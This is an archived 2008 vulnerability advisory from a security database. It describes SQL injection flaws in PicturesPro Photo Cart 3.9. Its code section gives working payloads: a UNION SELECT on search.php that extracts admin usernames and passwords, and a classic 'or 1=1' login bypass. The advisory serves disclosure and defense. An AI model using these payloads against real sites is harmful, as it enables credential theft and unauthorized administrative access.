exploits , vulnerabilities , articles , PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities

Title	PicturesPro Photo Cart Multiple SQL Injection Vulnerabilities
Published	2008-08-21-12:00AM
Updated	2008-08-28-05:05PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	~!Dok_tOR!~
Vulnerable	PICTURESPRO Photo Cart 3.9
Not Vulnerable
Code	Attackers can use a browser to exploit this issue.The following example script parameters are available:For the 'search.php' script: ' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*For the '_login.php' script: Email Address: 1' or 1=1/* Password: 1' or 1=1/*
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-11-22 KVIrc URI Handler Remote Command Execution Vulnerability
• 2008-11-22 NVIDIA Cg Toolkit Installer Insecure Temporary File Creation Vulnerability
• 2008-11-22 TkUsr Insecure Temporary File Creation Vulnerability
• 2008-11-21 TAU Tuning and Analysis Utilities Insecure Temporary File Creation Vulnerabilities
• 2008-11-21 Maildirsync Insecure Temporary File Creation Vulnerability
• 2008-11-21 TkMan Insecure Temporary File Creation Vulnerability
• 2008-11-21 Apple iPhone Configuration Web Utility for Windows Directory Traversal Vulnerability
• 2008-11-21 Cisco IOS and CatOS VLAN Trunking Protocol Packet Handling Denial Of Service Vulnerability
• 2008-11-21 vBulletin Visitor Messages Addon Comment Notification HTML Injection Vulnerability
• 2008-11-21 Apple Mac OS X CoreGraphics Multiple Memory Corruption Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 09:23:35 +0000